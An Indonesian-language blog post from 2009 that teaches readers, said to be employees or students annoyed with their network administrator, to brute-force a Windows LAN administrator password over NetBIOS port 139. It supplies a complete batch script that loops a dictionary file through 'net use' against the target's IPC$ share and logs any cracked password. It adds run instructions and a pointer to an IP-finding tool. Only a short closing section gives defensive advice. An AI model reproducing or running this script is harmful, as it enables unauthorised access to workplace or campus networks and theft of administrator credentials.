Rabu, April 08, 2009
Administrator
Bagi yang bekerja di komputer jaringan Network Neighbourhood atau Local Area Network (LAN), dan ingin menghack password administratornya, artikel ini mungkin bisa membantu. Apalagi, administrator LAN sering membuat ulah dengan menggunakan hak prerogatifnya sehingga membuat jengkel para karyawan atau mahasiswa.
Port 139 merupakan port yang di gunakan windows dalam sistem jaringan komputernya dengan menjalankan Netbios (Network Basic Input Output System). User yang bisa mengenali dan memanfaatkan port tersebut, akan bisa menggali informasi detail mengenai data jaringan termasuk password folder yang di share serta password administrator.
Kali ini, kita akan menggunakan program berekstensi bat yang kita buat dari notepad bernama Brute.bat. Sebelumnya, perlu di buat pula beberapa file berektensi txt yakni passlist.txt, logfile.txt dan output.txt. Untuk 2 file terakhir, tidak perlu di isi alias di kosongkan saja. Sedangkan passlist.txt harus di isi dengan kosa kata perkiraan password admin. Tuliskan secara berurutan mulai nama, nama anak, istri, pacar, tangal lahir, tempat bekerja, makanan favouritnya serta semua hal yang di perkirakan sebagai password admin. Di dunia underground, file passlist.txt ini di kenal dengan istilah Dictionary Attack atau kamus serangan.
Teknik menebak password seperti ini memang tergolong memakan waktu lebih lama. Namun, jika di lakukan secara sabar, apalagi di dorng oleh rasa jengkel pada admin, maka semuanya menjadi terasa ringan.
Setelah semuanya siap, kita akan membuat file brute.bat dengan mengcopykan kode berikut ini:
@echo off
if “%1″==”” goto fin
if “%2″==”” goto fin
del logfile.txt
FOR /F “tokens=1″ %%i in (passlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>logfile.txt && ^
echo %time% %date% >> outfile.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> output.txt && goto end
:fin
echo
Kemudian masuk ke menu Command Prompt melalui tombol Start -> Run ketik cmd. Lalu masuk ke folder tempat file ketiga file tersimpan. jalankan program Brute.bat dengan mengetik Brute . Contoh, Brute 192.169.21.02 Administrator. Untuk mengetahui IP Address admin, download program imaniac di www.nostalgia.host.sk. Imaniac adalah software pencari IP Address pada komputer yang terhubung dengan jaringan.
Jika berhasil menemukan password admin Network Neighbourhood, maka password tersebut akan di simpan di file output.txt yang telah kita buat sebelumnya.
Mencegah Pencurian Password Admin LAN
Untuk mengantisipasi serangan Dictionary Attack, administrator hendaknya membuat password yang kuat dan sulit di tebak melalui kombinasi huruf-angka serta sejumlah karakter lainnya. Di samping itu, perlu juga menonaktifkan menu Command Prompt agar tidak mudah di akses oleh user yang usil. Karena dari mene inilah aktifitas hacking di lakukan seperti Netbios dan lain-lain. Caranya, melalui tombol Start -> Run, ketik gpedit.msc, lalu tekan ENTER. Setelah masuk jendela Group Editor Policy Window, pilih User Configuration -> Administrative Templates -> System ->. Pada jendela sebelah kanan, cari Prevent Access To The Command Prompt lalu double klik. Setelah itu, klik Enable -> Apply -> Ok -> kemudian Restart computer.
